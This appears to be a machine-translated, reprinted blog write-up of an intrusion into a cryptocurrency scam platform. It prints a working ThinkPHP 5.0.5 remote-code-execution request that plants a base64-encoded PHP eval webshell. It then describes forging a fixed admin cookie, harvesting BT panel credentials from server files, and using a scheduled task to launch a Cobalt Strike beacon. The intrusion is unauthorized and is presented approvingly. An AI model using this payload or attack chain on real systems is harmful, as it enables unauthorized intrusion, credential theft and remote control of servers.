Title: A penetration test for a certain pig killing dish

Recently, I accidentally discovered a virtual currency buying a pig-killing plate, so I conducted a wave of tests, and the former director was like this.

It is entered with RCE for thinkphp5.0.5 and successfully written to the webshell.

s=index|think\app/invokefunctionfunction=call_user_func_arrayvars[0]=assertvars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))

Check the phpinfo information and found that all functions that can execute system commands have been disabled, and neither com nor dl loading can be used to execute corresponding system commands. The following is shown:

assert, system, passthru, exec, pcntl_exec, shell_exec, popen, proc_open//php system commands are all disabled

However, the read and write permissions of files do not disable functions such as assert(), file_put_contents(), etc. After checking, it was found that it was the following as shown in the Windows system:

Since all functions that php execute system commands are disabled, it is very uncomfortable to be unable to execute system commands. After downloading his website source code, I read it briefly and found that his administrator cookies are fixed and can be forged as follows, looking like the backdoor:

Therefore, you can log in to bypass the background, and the administrator cookie is fixed. Add the cookie field to log in to bypass it. Browser f12, add the above key value to the cookie to access the index, and you can successfully log in in the background as shown below, so you can make a lot of money (many people are cheated):

The front desk asked the customer service and learned about the transfer account (the operation method of the pig killing disk is that after the user transfers the money into the account provided by the customer service, the user then rushes the corresponding value of funds in his account to the background for review. After the review, he can use the value of money to invest and trade in currency) and leave it as evidence to submit:

Since the system commands were not executed before, if you want to break through, you start flipping through the files on his server. After flipping through the system files, you will find that the pagoda folder exists. The detection found that the pagoda service is indeed open, but the default login port has been modified, as shown below:

Looking through the pagoda file, you will find the file name admin_path.pl of the storage path, as shown below:

Found the Pagoda login portal and successfully accessed the login portal, as shown below:

Continue to search and find a default.pl file, which stores the corresponding login password:

After getting the password, I tried the default username and found that it was wrong and could not log in. Continue to flip through the file default.db file to record the login record. Find the login account:

Use the account password to successfully log in to the pagoda management backend, as shown below: Use the account password to successfully log in to the pagoda management backend, as shown below:

Find the scheduled task to modify the planned task and execute the online horse of the CS. After the online task is launched, change the planned task back to the following:

The CS was successfully launched as follows:

Check that IP only has a public address but no intranet, and there are several other devices deployed in the same C segment and are all the same set of things, so I won’t go down:

It's all in this way, nothing tastes boring

Reprinted in the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247486570idx=1sn=0c20fbbf4adbeb5b555164438b3197f7chksm=ce67a6f3f9102fe51b76482cd7d6bb644631ae469d8c1802956034077137ecd49ea56c8d2b1fscene=21#wechat_redirect

https://xz.aliyun.com/t/8224